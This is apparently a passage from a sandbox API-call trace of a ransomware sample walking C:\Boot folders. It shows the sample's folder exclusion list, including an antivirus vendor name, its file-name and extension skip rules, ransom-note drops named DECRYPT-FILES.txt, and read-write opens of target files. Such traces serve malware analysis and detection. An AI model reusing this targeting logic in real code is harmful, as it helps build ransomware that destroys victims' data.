StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.586] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.587] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.587] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\All Users") returned 0x0 [0179.587] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.587] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.587] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.587] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="AhnLab") returned 0x0 [0179.587] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.587] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0179.587] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.587] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\Fonts\\\\0a16c9.tmp") returned 25 [0179.587] CreateFileW (lpFileName="C:\\Boot\\Fonts\\\\0a16c9.tmp" (normalized: "c:\\boot\\fonts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.593] GetLastError () returned 0x5 [0179.593] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0179.593] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.593] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\Fonts\\\\DECRYPT-FILES.txt") returned 32 [0179.594] CreateFileW (lpFileName="C:\\Boot\\Fonts\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\fonts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.595] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0179.595] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="*" | out: lpString1="C:\\Boot\\Fonts\\*") returned="C:\\Boot\\Fonts\\*" [0179.595] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.596] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.596] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.596] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.596] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.596] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0179.596] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="DECRYPT-FILES.txt") returned -1 [0179.596] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="autorun.inf") returned 1 [0179.596] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="boot.ini") returned 1 [0179.596] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="desktop.ini") returned -1 [0179.596] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="ntuser.dat") returned -1 [0179.596] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="iconcache.db") returned -1 [0179.596] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="bootsect.bak") returned 1 [0179.596] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="ntuser.dat.log") returned -1 [0179.597] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="thumbs.db") returned -1 [0179.597] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Bootfont.bin") returned 1 [0179.597] lstrlenW (lpString="chs_boot.ttf") returned 12 [0179.597] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0179.597] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0179.597] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0179.597] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0179.597] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0179.597] lstrlenW (lpString="chs_boot.ttf") returned 12 [0179.597] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0179.597] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="chs_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\chs_boot.ttf") returned="C:\\Boot\\Fonts\\chs_boot.ttf" [0179.597] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.597] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.597] CloseHandle (hObject=0x0) returned 0 [0179.597] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.597] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0179.597] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="DECRYPT-FILES.txt") returned -1 [0179.597] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="autorun.inf") returned 1 [0179.597] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="boot.ini") returned 1 [0179.598] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="desktop.ini") returned -1 [0179.598] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="ntuser.dat") returned -1 [0179.598] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="iconcache.db") returned -1 [0179.598] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="bootsect.bak") returned 1 [0179.598] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="ntuser.dat.log") returned -1 [0179.598] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="thumbs.db") returned -1 [0179.598] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Bootfont.bin") returned 1 [0179.598] lstrlenW (lpString="cht_boot.ttf") returned 12 [0179.598] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0179.598] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0179.598] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0179.598] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0179.598] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0179.598] lstrlenW (lpString="cht_boot.ttf") returned 12 [0179.598] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0179.598] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="cht_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\cht_boot.ttf") returned="C:\\Boot\\Fonts\\cht_boot.ttf" [0179.598] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.598] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.599] CloseHandle (hObject=0x0) returned 0 [0179.600] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.600] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6aeb4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.600] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.600] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="DECRYPT-FILES.txt") returned 1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="autorun.inf") returned 1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="boot.ini") returned 1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="desktop.ini") returned 1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="ntuser.dat") returned -1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="iconcache.db") returned 1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="bootsect.bak") returned 1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="ntuser.dat.log") returned -1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="thumbs.db") returned -1 [0179.600] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Bootfont.bin") returned 1 [0179.600] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0179.600] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0179.600] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0179.600] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0179.600] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0179.600] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0179.600] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0179.600] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0179.600] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="jpn_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\jpn_boot.ttf") returned="C:\\Boot\\Fonts\\jpn_boot.ttf" [0179.600] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.601] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.601] CloseHandle (hObject=0x0) returned 0 [0179.601] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.601] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="DECRYPT-FILES.txt") returned 1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="autorun.inf") returned 1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="boot.ini") returned 1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="desktop.ini") returned 1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="ntuser.dat") returned -1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="iconcache.db") returned 1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="bootsect.bak") returned 1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="ntuser.dat.log") returned -1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="thumbs.db") returned -1 [0179.601] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Bootfont.bin") returned 1 [0179.601] lstrlenW (lpString="kor_boot.ttf") returned 12 [0179.601] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0179.601] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0179.601] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0179.601] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0179.601] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0179.601] lstrlenW (lpString="kor_boot.ttf") returned 12 [0179.601] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0179.601] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="kor_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\kor_boot.ttf") returned="C:\\Boot\\Fonts\\kor_boot.ttf" [0179.601] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.602] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.602] CloseHandle (hObject=0x0) returned 0 [0179.602] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.602] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="DECRYPT-FILES.txt") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="autorun.inf") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="boot.ini") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="desktop.ini") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="ntuser.dat") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="iconcache.db") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="bootsect.bak") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="ntuser.dat.log") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="thumbs.db") returned 1 [0179.602] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Bootfont.bin") returned 1 [0179.602] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0179.602] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0179.602] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0179.602] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0179.602] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0179.602] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0179.602] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0179.602] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0179.603] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="wgl4_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned="C:\\Boot\\Fonts\\wgl4_boot.ttf" [0179.603] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.603] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.603] CloseHandle (hObject=0x0) returned 0 [0179.603] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.603] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0179.603] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.604] CloseHandle (hObject=0xffffffff) returned 0 [0179.604] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0179.604] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0179.604] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0179.604] lstrcatW (in: lpString1="fr-FR", lpString2="\\" | out: lpString1="fr-FR\\") returned="fr-FR\\" [0179.604] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="fr-FR\\" | out: lpString1="C:\\Boot\\fr-FR\\") returned="C:\\Boot\\fr-FR\\" [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Program Files") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch=":\\Windows") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Games\\") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\All Users") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="AhnLab") returned 0x0 [0179.604] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.604] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0179.604] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.604] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\fr-FR\\\\0a16c9.tmp") returned 25 [0179.604] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\\\0a16c9.tmp" (normalized: "c:\\boot\\fr-fr\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.605] GetLastError () returned 0x5 [0179.605] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0179.605] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.605] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\fr-FR\\\\DECRYPT-FILES.txt") returned 32 [0179.605] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\fr-fr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.607] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0179.607] lstrcatW (in: lpString1="C:\\Boot\\fr-FR\\", lpString2="*" | out: lpString1="C:\\Boot\\fr-FR\\*") returned="C:\\Boot\\fr-FR\\*" [0179.607] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.607] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.607] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.607] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.607] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.607] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.607] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.607] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.607] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.607] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.607] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.607] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.608] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.608] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.608] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.608] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.608] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.608] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.608] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.608] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.608] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.608] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0179.608] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.608] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\fr-FR\\" | out: lpString1="C:\\Boot\\fr-FR\\") returned="C:\\Boot\\fr-FR\\" [0179.608] lstrcatW (in: lpString1="C:\\Boot\\fr-FR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned="C:\\Boot\\fr-FR\\bootmgr.exe.mui" [0179.608] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.608] CreateFileW 